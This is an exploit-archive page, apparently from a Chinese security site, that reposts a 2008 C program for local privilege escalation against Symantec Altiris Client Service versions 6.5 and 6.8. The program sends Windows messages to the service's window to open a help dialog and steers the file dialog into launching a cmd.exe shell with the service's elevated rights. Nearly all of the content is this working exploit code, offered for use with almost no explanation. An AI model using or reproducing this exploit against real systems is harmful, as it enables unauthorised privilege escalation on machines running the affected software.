首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Symantec Altiris Client Service 6.8.378 Local Privilege Escalation Exploit 来源：ahernandez [at] sybsecurity.com 作者：Alex 发布时间：2008-05-16   // 0day PRIVATE NOT DISTRIBUTE!!! // // Symantec Altiris Client Service Local Exploit (0day) // // Affected Versions : Altiris Client 6.5.248 //   Altiris Client 6.5.299 //   Altiris client 6.8.378 // // Alex Hernandez aka alt3kx // ahernandez [at] sybsecurity.com // // Eduardo Vela aka sirdarckcat // sirdarckcat [at] gmail.com // // We'll see you soon at ph-neutral 0x7d8 #include "stdio.h" #include "windows.h" int main(int argc, char* argv[]) { HWND lHandle, lHandle2; POINT point; int id,a=0; char langH[255][255]; char langO[255][255]; char wname[]="Altiris Client Service"; strcpy(langH[0x0c],"Aide de Windows"); strcpy(langH[0x09],"Windows Help"); strcpy(langH[0x0a],"Ayuda de Windows"); strcpy(langO[0x0c],"Ouvrir"); strcpy(langO[0x09],"Open"); strcpy(langO[0x0a],"Abrir"); printf("##########################################################\n"); printf("#                  Altiris Client Service                #\n"); printf("# WM_COMMANDHELP Windows Privilege Escalation Exploit    #\n"); printf("# by sirdarckcat & alt3kx                                #\n"); printf("#                                                        #\n"); printf("# This exploit is based on www.milw0rm.com/exploits/350  #\n"); printf("# Utility Manager Privilege Elevation Exploit (MS04-019) #\n"); printf("# by Cesar Cerrudo                                       #\n"); printf("##########################################################\n\n");   id=PRIMARYLANGID(GetSystemDefaultLangID()); if (id==0 && (id=PRIMARYLANGID(GetUserDefaultLangID()))){     printf("Lang not found, using english\n");     id=9; } char sText[]="%windir%\\system32\\cmd.ex?"; if (argc<2){     printf("Use:\n> %s [LANG-ID]\n\n",argv[0]);     printf("Look for your LANG-ID here:\n");     printf("http://msdn2.microsoft.com/en-us/library/ms776294.aspx\n");     printf("\nAnyway, the program will try to guess it.\n\n");     return 0; }else{     if (argc==2){        if (langH[atoi(argv[1])]){           id=atoi(argv[1]);           printf("Lang changed\n");        }else{           printf("Lang not supported\n",id);        }     } } printf("Using Lang %d\n",id); printf("Looking for %s..\n",wname); lHandle=FindWindow(NULL, wname);   if (!lHandle) {   printf("Window %s not found\n", wname);   return 0; }else{   printf("Found! exploiting..\n"); } PostMessage(lHandle,0x313,NULL,NULL); Sleep(100); SendMessage(lHandle,0x365,NULL,0x1); Sleep(300); pp: if (!FindWindow(NULL, langH[id])){     printf("Help Window not found.. exploit unsuccesful\n");     if (id!=9){        printf("Trying with english..\n");        id=9;        goto pp;     }else{           return 0;     } }else{     printf("Help Window found! exploiting..\n"); } SendMessage (FindWindow(NULL, langH[id]), WM_IME_KEYDOWN, VK_RETURN, 0); Sleep(500); lHandle = FindWindow("#32770",langO[id]); lHandle2 = GetDlgItem(lHandle, 0x47C); Sleep(500); printf("Sending path..\n"); SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText); Sleep(800); SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0); lHandle2 = GetDlgItem(lHandle, 0x4A0); printf("Looking for cmd..\n"); SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0); Sleep(500); lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL); lHandle2 = GetDlgItem(lHandle2, 0x1); printf("Sending keys..\n"); SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0); SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0); SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0); Sleep(500); mark: PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0); Sleep(1000); point.x =10; point.y =30; lHandle2=WindowFromPoint(point);   Sleep(1000); printf("Opening shell..\n"); SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0);   Sleep(1000); SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0);   Sleep(1000); SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0);   Sleep(1000); if (!FindWindow(NULL,"C:\\WINDOWS\\system32\\cmd.exe") && !FindWindow(NULL,"C:\\WINNT\\system32\\cmd.exe")){     printf("Failed\n");     if (!a){         a++;         goto mark;     } }else{        printf("Done!\n"); } if(!a){     SendMessage (lHandle, WM_CLOSE,0,0);     Sleep(500);     SendMessage (FindWindow(NULL, langH[id]), WM_CLOSE, 0, 0);     SendMessage (FindWindow(NULL, argv[1]), WM_CLOSE, 0, 0); }else{     printf("The exploit failed, but maybe the context window of the shell is visibile.\n"); } return 0; }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Debian OpenSSL Predictable PRN ·Pet Grooming Management System ·MS Internet Explorer (Print Ta ·La-Nai CMS <= 1.2.16 (fckedito ·IDAutomation Bar Code ActiveX ·EQDKP 1.3.2f (user_id) Authent ·Advanced Image Hosting (AIH) 2 ·Debian OpenSSL Predictable PRN ·CMS Made Simple <= 1.2.4 (File ·Archangel Weblog 0.90.02 (post ·Battle.net Clan Script <= 1.5. ·FicHive 1.0 (category) Remote   推荐广告

CopyRight © 2002-2025 VFocuS.Net All Rights Reserved